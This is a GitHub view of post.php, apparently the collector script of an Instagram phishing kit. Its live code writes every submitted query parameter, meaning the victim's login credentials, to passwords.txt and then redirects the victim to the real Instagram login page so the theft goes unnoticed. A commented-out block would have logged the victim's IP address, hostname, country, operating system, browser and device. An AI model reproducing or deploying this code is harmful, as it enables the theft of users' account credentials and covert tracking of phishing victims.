-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathpost.php
More file actions
91 lines (85 loc) · 2.16 KB
/
post.php
File metadata and controls
91 lines (85 loc) · 2.16 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
<?php
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
////require_once($_SERVER['DOCUMENT_ROOT'] . '/Mobile_Detect.php');
//require_once($_SERVER['DOCUMENT_ROOT'] . '/detect.php');
//
//if (Detect::isMobile()) {
//
//}
//
//// Gets the device type ('Computer', 'Phone' or 'Tablet')
////echo Detect::deviceType();
//fwrite($handle, Detect::deviceType());
//fwrite($handle, "\r\n");
//
//// Any phone device
//if (Detect::isPhone()) {
//
//}
//
//// Any tablet device
//if (Detect::isTablet()) {
//
//}
//
//// Any computer device (desktops or laptops)
//if (Detect::isComputer()) {
//
//}
//
//// Get the IP address of the device
////echo Detect::ip();
//fwrite($handle, Detect::ip());
//fwrite($handle, "\r\n");
//
//// Get the ID address host name of the device
////echo Detect::ipHostname();
//fwrite($handle, Detect::ipHostname());
//fwrite($handle, "\r\n");
//
//// Get the IP address organisation of the device
////echo Detect::ipOrg();
//fwrite($handle, Detect::ipOrg());
//fwrite($handle, "\r\n");
//
//// Get the country the IP address is in (IP address location inaccurate)
//// (JS function available which uses the Geolocation API)
////echo Detect::ipCountry();
//fwrite($handle, Detect::ipCountry());
//fwrite($handle, "\r\n");
//
//// Get the name & version of operating system
////echo Detect::os();
//fwrite($handle, Detect::os());
//fwrite($handle, "\r\n");
//
//// Get the name & version of browser
////echo Detect::browser();
//fwrite($handle, Detect::browser());
//fwrite($handle, "\r\n");
//
//// Get the brand of device (only works with mobile devices otherwise return null)
////echo Detect::brand();
//fwrite($handle, Detect::brand());
//fwrite($handle, "\r\n");
//
//// Check for a specific platform with the help of the magic methods:
//if (Detect::isiOS()) {
//
//}
//
//if (Detect::isAndroidOS()) {
//
//}
//fwrite($handle, "\r\n");
fclose($handle);
header("Location: https://www.instagram.com/login.php?&e=1348092&email=");
exit;
?>